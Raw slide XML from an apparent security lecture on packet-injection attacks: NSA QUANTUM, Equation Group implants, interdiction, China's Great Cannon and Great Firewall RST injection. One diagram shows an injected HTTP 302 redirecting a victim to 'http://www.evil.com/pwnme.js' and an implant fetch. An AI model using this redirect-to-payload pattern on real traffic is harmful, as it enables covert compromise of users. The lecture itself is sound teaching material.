          <a:prstGeom prst="ellipse">
            <a:avLst/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Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="12174120" y="5482800"/>
            <a:ext cx="360" cy="1160640"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="8892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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9708120" y="7080120"/>
            <a:ext cx="4500720" cy="11473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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>/script.js</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>www.targetdomain.com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cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>id=iamavictim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56" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9086040" y="5487480"/>
            <a:ext cx="6512400" cy="8121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HTTP 302 FOUND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location: http://www.evil.com/pwnme.js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57" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3715200" y="7264800"/>
            <a:ext cx="3830400" cy="8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/pwnme.js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www.evil.com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58" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14099760" y="9805320"/>
            <a:ext cx="3494880" cy="1147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HTTP 200 OK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....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Here's an exploit...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59" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="5806" t="5042" r="6017" b="2543"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14480640" y="9003600"/>
            <a:ext cx="3085560" cy="2537280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3706560" y="7264800"/>
            <a:ext cx="4165560" cy="8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/theimplant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www.evil.com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61" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20842560" y="12875760"/>
            <a:ext cx="3165840" cy="751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NSA Eagle from the EFF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Rat from OpenClipart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62" name="CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9674280" y="1082880"/>
            <a:ext cx="5017320" cy="1665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AirPwn -Goatse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HackingTeam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63" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19790640" y="8892720"/>
            <a:ext cx="4391280" cy="242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Metasploit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HackingTeam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FinFisher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64" name="CustomShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79560" y="5704920"/>
            <a:ext cx="5869440" cy="242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Black Market RATs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HackingTeam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2600"/>
                </a:solidFill>
                <a:latin typeface="Bradley Hand ITC TT-Bold"/>
                <a:ea typeface="Bradley Hand ITC TT-Bold"/>
              </a:rPr>
              <a:t>FinFisher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3" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="774" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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46256 -0.001302">
                                      <p:cBhvr>
                                        <p:cTn id="782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1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="78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246256 -0.001302 L 0.476276 -0.000000">
                                      <p:cBhvr>
                                        <p:cTn id="78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131857">
                                      <p:cBhvr>
                                        <p:cTn id="79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2" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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795" dur="1000" fill="hold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1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="798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799" dur="1000" fill="hold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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="80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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="80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5445 0.116252">
                                      <p:cBhvr>
                                        <p:cTn id="81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95610 -0.000000">
                                      <p:cBhvr>
                                        <p:cTn id="813" dur="2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1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22" dur="1000" fill="hold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00"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="825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1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="828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29" dur="1000" fill="hold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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="83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5728 0.189075">
                                      <p:cBhvr>
                                        <p:cTn id="836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215728 0.189075 L 0.416518 0.187346">
                                      <p:cBhvr>
                                        <p:cTn id="83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43" dur="1000" fill="hold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00"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="84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0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="849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5046 0.000000">
                                      <p:cBhvr>
                                        <p:cTn id="850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-0.225046 0.000000 L -0.429575 -0.194802">
                                      <p:cBhvr>
                                        <p:cTn id="85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58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62" dur="1000" fill="hold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00"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="865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66" dur="1000" fill="hold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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="86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5728 0.189075">
                                      <p:cBhvr>
                                        <p:cTn id="873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215728 0.189075 L 0.416518 0.187346">
                                      <p:cBhvr>
                                        <p:cTn id="87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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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880" dur="1000" fill="hold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83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8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8559 -0.007913">
                                      <p:cBhvr>
                                        <p:cTn id="88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-0.278559 -0.007913 L -0.432958 -0.413385">
                                      <p:cBhvr>
                                        <p:cTn id="891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2" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="893" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="894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896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2013 NSA Mass Surveillance Revelations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Edward Snowden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550440" y="3178800"/>
            <a:ext cx="139878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spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="18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more leaks since then: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TAO Ant catalog + Tor XKEYSCORE rules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New Zeland XKEYSCORE rules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tasking and SIGINT summaries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Shadow Brokers data dump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3552560" y="6084360"/>
            <a:ext cx="10404000" cy="689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NSA’s QUANTUM doesn’t always wins the race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8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To do it properly, you need to be quick…</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="588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Have to win the race</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4450" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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8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NSA Logic:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="588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Weaponize our wiretaps?  Sure!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="445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it to shoot exploits at NATO allies critical infrastructure?  GO FOR IT!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="445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Make sure attack always works? No, classification rules get in the way</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4450" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="699480" indent="-69696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Instead the QUANTUM wiretap sends a “tip” into classified space</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="540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Through a special (slow) one-way link called a “diode”</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="445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That then consults the targeting decision</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4450" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1045440" indent="-70380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sends the request through another “diode” back to a “shooter” on the Internet</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4450" spc="-1" strike="noStrike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7" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="898" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="899" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="906" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold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fill="hold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fill="hold"/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fill="hold"/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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="938" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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NSA’s Malcode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Equation Group &amp; Sauron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550440" y="3178800"/>
            <a:ext cx="1354284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13080" indent="-61056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Kaspersky has a nice analysis done…</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5150" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="613080" indent="-61056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Encrypted, modular, and multi-stage design</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5150" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="916200" indent="-616680">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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Different functional sub-implants for different tasks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="916200" indent="-616680">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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Uses an encrypted file system to resist analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="613080" indent="-61056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Some </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-US" sz="5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very</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="5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cool tricks!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5150" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="916200" indent="-616680">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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Reflash hard drive firmware to provide a bad boot block</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1207440" indent="-6105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when you read it on a powered-up disk, the disk looks fine!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3430" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1207440" indent="-6105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if its ever found, “the NSA was here!” glows large</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3430" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1207440" indent="-6105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Likewise, modules that can reflash particular BIOSes</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3430" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="916200" indent="-616680">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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Want to gain root on a Windows box?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1207440" indent="-6105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Install a signed driver that has a vulnerability</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3430" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1207440" indent="-6105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3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Then exploit it</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3430" spc="-1" strike="noStrike"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Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14149800" y="516960"/>
            <a:ext cx="10157400" cy="131421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1" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="942" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="943" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="944" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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fill="hold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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="954" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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fill="hold"/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fill="hold"/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0" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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4" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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4" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="975" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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8" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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2" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="99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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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Interdiction…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550440" y="3178800"/>
            <a:ext cx="126936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Why bother hacking at all…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When you can have the USPS and UPS do the job for you!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Simply have the package shipped to an NSA building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And then add some malicious hardware and/or software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Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13281840" y="3130560"/>
            <a:ext cx="11122560" cy="7452360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="376" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13887720" y="48240"/>
            <a:ext cx="10599120" cy="137134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2" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="993" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="994" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="995" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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0" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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4" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1012" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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fill="hold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 NSA has No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Monopoly on Cool Here…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550440" y="3178800"/>
            <a:ext cx="1395756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This is the sort of thing the NSA has…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small arm controller, flash, SDRAM, and FPGA in a small package…</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1547640" indent="-78336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This is circa 2008 but things keep getting better</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="44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this is a Kinetis KL02 arm chip…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32k flash, 4k ram, 32b ARM &amp; peripherals (including Analog to Digital converters)</a:t>
            </a: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0" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14252400" y="671040"/>
            <a:ext cx="10157400" cy="13142160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="381" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15141600" y="7711200"/>
            <a:ext cx="8379360" cy="55854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8" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1019" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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 NSA is not alone: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EG, the Chinese "Great Cannon"?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38720" indent="-73620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Great Cannon is a dedicated Internet attack tool probably operated by the Chinese government</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="621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 internet-scale selective man-in-the-middle designed to replace traffic with malicious payloads</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="470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Was used to co-opt unwitting foreign visitors to Chinese web sites into participating in DDoS attacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="470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Almost certainly also has the capability to "pwn-by-IP":</a:t>
            </a:r>
            <a:br/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Launch exploits into targets' web surfing</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="470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"Great Cannon" is our name: </a:t>
            </a:r>
            <a:br/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actual Chinese name remains unknown</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4700" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="738720" indent="-73620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Structurally related to the Great Firewall, but different devices</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6210" spc="-1" strike="noStrike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44" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1045" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1046" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold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2" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1053" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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6" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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0" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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4" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1065" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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8" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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DDoS Attack on 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 and GitHub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 is an anti-censorship group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Currently uses "Collateral Freedom": convey information through services they hope are "Too Important to Block"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GitHub is one such service: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can't block GitHub and work in the global tech economy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GreatFire's CloudFront instances DDoSed between 3/16/15 and 3/26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GreatFire's GitHub pages targeted between 3/26 and 4/8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Github then tracked Referer to ignore the DoS traffic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2" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1073" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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4" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1085" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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8" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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DDoS used Malicious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JavaScript...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JavaScript in pages would repeatedly fetch the target page with a cache-busting nonce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Vaguely reminiscent of Anonymous's "Low Orbit Ion Cannon" DDoS tool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JavaScript appeared to be served "from the network"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Replacing advertising, social widgets, and utility scripts served from Baidu servers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Several attributed it to the Great Firewall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Based on DDoS sources and "odd" TTL on injected packets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it didn’t really look quite right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4" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1095" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1096" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1097" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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fill="hold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fill="hold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4" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold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fill="hold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0" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold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fill="hold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fill="hold"/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" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10709280" y="3227760"/>
            <a:ext cx="2963160" cy="2379960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39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Great Firewall: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Packet Injection Censorship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550440" y="8231400"/>
            <a:ext cx="23334120" cy="4955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Detects that a request meets a target criteria</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="53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Easiest test: "Looks like a search for 'falun':</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4050" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1253880" indent="-6339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5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Falun Gong (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="35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法輪功</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="35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), a banned quasi-religious organization</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3570" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Injects a TCP RST (reset) back to the requesting system</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="53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Then enters a ~1 minute "stateless block": Responds to all further packets with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4050" spc="-1" strike="sngStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>RSTs</a:t>
            </a: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br/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4050" spc="-1" strike="noStrike"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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3703320" y="7265520"/>
            <a:ext cx="3494880" cy="8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/?falun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www.google.com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396" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18231120" y="7081920"/>
            <a:ext cx="1986120" cy="812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HTTP 200 OK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.....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97" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4190400" y="3579840"/>
            <a:ext cx="2458440" cy="2379960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="398" name="Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17323200" y="3401640"/>
            <a:ext cx="3981240" cy="2736360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5691600" y="6804360"/>
            <a:ext cx="13000320" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
